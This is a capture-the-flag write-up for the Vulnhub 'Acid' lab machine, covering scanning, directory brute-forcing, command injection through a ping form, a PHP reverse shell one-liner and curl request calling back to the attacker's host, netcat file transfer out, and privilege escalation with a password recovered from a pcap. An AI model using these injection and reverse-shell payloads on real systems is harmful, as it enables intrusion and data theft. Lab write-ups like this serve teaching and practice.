Vulnhub - Acid

Since Fart knocker in June I have worked on an other vulnhub machine: darknet. But this one is really hard and get me stuck. I was a bit demotivated to continue vulnhub's machines but I got some time this week, therefore I tried the Acid one.

The goal is as usual, get root on the virtual machine. Let's go:

Host Discovery

As always, we start with host discovery: Nmap and nikto are our friends for this step.

nmap

We launch nmap against the virtual machine:

$ nmap 192.168.0.18 -p0-65535 -A -oA nmap
Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-08 12:08 CEST
Stats: 0:07:31 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.89% done; ETC: 12:15 (0:00:05 remaining)
Nmap scan report for 192.168.0.18
Host is up (0.0045s latency).
Not shown: 65535 closed ports
PORT      STATE SERVICE
33447/tcp open  unknown
|_http-title: /Challenge

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .

We got a nice Apache web server with a simple splash screen. Notice the page title: /Challenge.

Nikto

I ran nikto on the target but nothing pop out.

Web exploitation

Page source

As we come pretty empty handed, we check the page source and two interesting things came out:

• Some hexadecimal code at the end of the page: 0x643239334c6d70775a773d3d
• the title of the page (we can see it in the nmap scan) is /Challenge and there is an other web page at this address.

Hexa code

We will start with the first lead the hexadecimal code:

0x643239334c6d70775a773d3d

We convert it to string and we got:

?d293LmpwZw==

We decode the base64 and we got:

wow.jpg

We go to the url (the /images/ is given with the background image of the first web page):

http://192.168.0.18:33447/images/wow.jpg

As a result we got a nice image that reward us for our success.

Yeah it seems to be some troll :)

/Challenge

Let us dig the second lead: the page title. By adding /Challenge in the URL, we land on an authentication interface.

I tried to use SQL injection but nothing. We will try dirbuster with the small dictionary (`/usr/share/dirbuster/directory-list-2.3-small.txt):

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Sep 08 16:54:05 CEST 2015
--------------------------------

http://192.168.0.18:33447
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/Challenge/

Dirs found with a 403 response:

/Challenge/css/
/Challenge/includes/
/Challenge/js/
/Challenge/styles/
/Challenge/less/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/Challenge/index.php
/Challenge/error.php
/Challenge/includes/functions.php
/Challenge/cake.php

Files found with a 302 responce:

/Challenge/include.php
/Challenge/includes/logout.php
/Challenge/hacked.php


--------------------------------

We got the cake.php page but as we all know "The cake is a lie". We noticed that the page title is one more time a folder: /Magic_box. When going to /Challenge/Magic_box we got a 403 forbidden page. Let us fire dirbuster again:

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Sep 08 17:17:43 CEST 2015
--------------------------------

http://192.168.0.18:33447
--------------------------------
Directories found during testing:

Dirs found with a 403 response:

/Challenge/Magic_Box/
/Challenge/Magic_Box/proc/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/Challenge/Magic_Box/low.php
/Challenge/Magic_Box/command.php

Files found with a 302 responce:

/Challenge/Magic_Box/proc/validate.php


--------------------------------

We got some nice result mostly the /command.php page.

Command execution

The page let us ping an other machine in the network. Nevertheless the page name let us think that we can use command exploitation. If we add a ; in the filed and a command it seems to works, for instance with ; ls we got (I use burp for all my pentest, the output of the command is in the response page):

command.php
command.php.save
command2.php.save
command2.php.save.1
low.php
proc
tails.php

We can also read /etc/passwd: there is two users on the server: acid and saman.

Let us try to get a reverse shell with that.

reverse shell

As always, a good source of information is pentest monkey.

We know the site use php so we will try the php reverse shell first:

• On the host we execute: nc -l -p 6666
• On the target (via the ping interface) we query: ; php -r '$sock=fsockopen("192.168.0.13",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

It got us a shell on the machine (without tty/pty). But executing the request in the ping interface each time we want the shell in painful, so I extract the curl command from burp:

curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Referer: http://192.168.0.18:33447/Challenge/Magic_Box/command.php' -H 'Content-Type: application/x-www-form-urlencoded' \
    -b 'sec_session_id=2cdjrm9k6khpfiilsad1kmnpj2' \
    --data-binary $'IP=%3B+php+-r+%27%24sock%3Dfsockopen%28%22192.168.0.13%22%2C6666%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&submit=submit' \
    'http://192.168.0.18:33447/Challenge/Magic_Box/command.php'

Now that we have a shell, let us see what we can do.

Shell exploitation

First we discover what is at our disposal, mostly in the /home/ (bash_history). In the /home/acid/ there is something interesting but empty:

ls -la /home/acid/.su*
-rw-r--r-- 1 acid acid 0 Jul 31 17:27 /home/acid/.sudo_as_admin_successful

Let us see what else we got on the machine:

$ ls /
bin
boot
cdrom
dev
etc
home
initrd.img
lib
lost+found
media
mnt
opt
proc
root
run
s.bin
sbin
srv
sys
tmp
usr
var
vmlinuz
$ ls /opt/
$ ls /media
acid
floppy
floppy0
$ ls /s.bin
investigate.php
$ cat /s.bin/investigate.php
<?php
echo "Now you have to behave like an investigator to catch the culprit\n";
?

That is interesting the php file in /s.bin/ clearly tell us to investigate. But what we need know is a privilege escalation ti gain root access.

Privilege escalation

I tried the overlayfs exploit (the same as with Fart knocker) without success:

• I compiled the exploit on an other 32 bits virtual machine;
• I transfered it to the shell via netcat;

• And it failed:

  $ ./ofs.bin : 4: spawning threads mount #1 mount #2 child threads done exploit failed

But we were given an hint.

More investigations

The pwnwiki.io wiki is always a good source of information. So with more investigation we look at bash_history, search for *txt* files, an so on. Then *pcap* files:

$ find / -name *pcap* 2>/dev/null
/lib/modules/3.19.0-15-generic/kernel/drivers/rtc/rtc-pcap.ko
/lib/modules/3.19.0-15-generic/kernel/drivers/input/misc/pcap_keys.ko
/lib/modules/3.19.0-15-generic/kernel/drivers/input/touchscreen/pcap_ts.ko
/lib/modules/3.19.0-15-generic/kernel/drivers/regulator/pcap-regulator.ko
/sbin/raw_vs_isi/hint.pcapng
/sbin/getpcaps
/sys/bus/spi/drivers/ezx-pcap
/usr/share/doc/libpcap0.8
/usr/share/mime/application/vnd.tcpdump.pcap.xml
/usr/share/man/man7/pcap-filter.7.gz
/usr/share/man/man1/getpcaps.1.gz
/usr/lib/i386-linux-gnu/libpcap.so.1.6.2
/usr/lib/i386-linux-gnu/libpcap.so.0.8
/usr/src/linux-headers-3.19.0-15/include/linux/mfd/ezx-pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/ezx/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/touchscreen/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/rtc/drv/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/input/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/regulator/pcap.h
/var/lib/dpkg/info/libpcap0.8:i386.postinst
/var/lib/dpkg/info/libpcap0.8:i386.shlibs
/var/lib/dpkg/info/libpcap0.8:i386.postrm
/var/lib/dpkg/info/libpcap0.8:i386.md5sums
/var/lib/dpkg/info/libpcap0.8:i386.symbols
/var/lib/dpkg/info/libpcap0.8:i386.list

Yes /sbin/raw_vs_isi/hint.pcapng!

pcap

We transfer the file with netcat:

• On our attack machine: nc -lp 1234 > pcap
• On the server: nc 192.168.0.13 1234 < /sbin/raw_vs_isi/hint.pcapng

We open the pcap file with wireshark. There is a lot of information in this file, over 6 000 trams. On the 6 212 we notice some sort of text. By following the TCP stream (wireshark function) we discover what seems to be a chat exchange:

heya

hello What was the name of the Culprit ???

saman and now a days he's known by the alias of 1337hax0r

oh...Fuck....Great...Now, we gonna Catch Him Soon :D

Yes .. We have to !! The mad bomber is on a rage

Ohk...cya

Over and Out

Great, what does it means? We know that saman is one of the user on the machine. Maybe we got some hints about it password or something like that.

interactive shell

In order to execute a su, we need a interactive shell (with pty/tty). Once more pentest monkey will help us:

python -c 'import pty; pty.spawn("/bin/sh")'

As /bin/sh is a symlink to dash, we directly use bash:

python -c 'import pty; pty.spawn("/bin/bash")'

We now need to try to connect as saman.

Saman

With our beautiful shell we jut have to su saman to try to connect as saman:

www-data@acid:/var/www/html/Challenge/Magic_Box$ su saman
su saman
Password: 1337hax0r

It works! Let us try sudo su:

saman@acid:/var/www/html/Challenge/Magic_Box$ sudo su
sudo su
[sudo] password for saman: 1337hax0r
root@acid:/var/www/html/Challenge/Magic_Box# cat /root/flag.txt
cat /root/flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I  hope you like it.


FLAG NAME: "Acid@Makke@Hax0r

Conclusion

It was a nice box to root but as I read the other write up it seems that my way was not the one expected. Nevertheless, thank to Avinash Kumar Thapa for the box and vulnhub.